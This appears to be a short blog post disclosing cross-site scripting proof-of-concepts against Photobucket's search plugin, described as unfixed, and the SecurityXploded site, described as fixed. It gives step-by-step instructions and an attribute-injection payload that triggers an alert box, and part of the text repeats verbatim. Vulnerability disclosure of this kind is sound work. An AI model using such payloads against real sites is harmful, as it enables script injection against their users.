POC for photobucket [unfixed]:
*Load http://photobucket.com/plugin/search
* Enter the following code and hit enter:
" onload=alert('xss!')>click me!"
POC for SecurityXploded [FIXED]:
*Load http://securityxploded.com
* Enter the following code and hit enter:
" onload=alert('xss!')>click me!"
The researcher claimed to have reported to PhotoBucket team. Let us hope they will fix the vulnerability soon.
After i sent notification to SecurityXploded, they fixed the vulnerability immediately
*Load http://securityxploded.com
* Enter the following code and hit enter:
" onload=alert('xss!')>click me!"
The researcher claimed to have reported to PhotoBucket team. Let us hope they will fix the vulnerability soon.
After i sent notification to SecurityXploded, they fixed the vulnerability immediately
No comments:
Post a Comment